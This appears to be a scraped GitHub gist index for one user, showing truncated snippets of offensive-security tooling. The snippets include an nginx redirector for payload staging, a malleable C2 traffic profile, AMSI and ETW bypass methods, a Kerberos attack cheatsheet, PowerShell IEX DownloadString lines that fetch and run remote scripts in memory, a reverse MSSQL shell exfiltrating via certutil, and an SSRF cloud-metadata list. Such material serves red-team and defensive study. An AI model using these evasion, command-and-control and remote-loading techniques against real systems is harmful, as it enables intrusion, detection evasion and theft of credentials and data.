Christopher CalfCrusher
CalfCrusher / nginx_example_vhost
Created November 12, 2023 10:05
Nginx as redirector for payloads
limit_req_zone $binary_remote_addr zone=req_zone:10m rate=5r/m;
server {
    root /var/www/;
    index index.html;
    location / {
        try_files $uri $uri/ =404;
    location = /bypassamsiandrequeststager.txt {
CalfCrusher / custom_amazon_empire_malleable.profile
Last active December 12, 2023 10:37
Amazon Empire C2 Custom Malleable profile
# Modified Amazon browsing traffic profile
set sleeptime "10000"; # Increased sleep time to 10 seconds
set jitter "500"; # Increased jitter to 500 milliseconds
set maxdns "255";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"; # Changed the User Agent
http-get {
CalfCrusher / SimulateInternetZoneTest.ps1
Created November 7, 2023 00:18 — forked from mgraeber-rc/SimulateInternetZoneTest.ps1
Example highlighting why attackers likely choose ISO/IMG as a delivery mechanism: it evades SmartScreen because Mark-of-the-Web (MOTW) cannot be applied to non-NTFS volumes
Add-Type -OutputAssembly hello.exe -TypeDefinition @'
using System;
public class Hello {
    public static void Main(string[] Args) {
        System.Console.WriteLine("Hello, world!");
CalfCrusher /
Created October 15, 2023 10:57 — forked from TarlogicSecurity/
A cheatsheet with commands that can be used to perform Kerberos attacks

Kerberos cheatsheet

python -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

CalfCrusher / KillETW.ps1
Created October 7, 2023 15:52 — forked from tandasat/KillETW.ps1
Disable ETW of the current PowerShell session
# This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
# to bypass Suspicious ScriptBlock Logging for readability.
CalfCrusher /
Created October 7, 2023 15:07 — forked from D3Ext/
All methods to bypass AMSI (2022)

AMSI Bypass

To test all these techniques, you can simply type "Invoke-Mimikatz" into your PowerShell terminal; you'll notice that even if you haven't imported Mimikatz, it will detect that as malicious. But if AMSI is off or you avoid it, it will just say that "it's not recognized as the name of a cmdlet", so you could say that you've bypassed AMSI.

However, some methods may be detected by the AV, but most of them actually work without problem.

Powershell downgrade

The first and worst way to bypass AMSI is downgrading the PowerShell version to 2.0.

# Function to XOR a string with a key
xor_string() {
    local string=$1
    local key=$2
    local result=""
    for ((i = 0; i < ${#string}; i++)); do
        local char=${string:i:1}
CalfCrusher / In-memory PS injection.txt
Created May 30, 2023 17:53 — forked from chr0n1k/In-memory PS injection.txt
Some in-memory Powershell injection scripts
#IEX (New-Object Net.WebClient).DownloadString('');
#IEX (New-Object Net.WebClient).DownloadString('')
#"IEX (New-Object Net.WebClient).DownloadString('')
#IEX (New-Object Net.WebClient).DownloadString(''); Get-VaultCredential
#IEX (New-Object Net.WebClient).DownloadString('')
CalfCrusher /
Created May 19, 2023 15:03 — forked from xassiz/
Reverse MSSQL shell
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
CalfCrusher / cloud_metadata.txt
Created May 11, 2023 16:15 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
## AWS
# Amazon Web Services (No Header Required)
# from[ROLE NAME]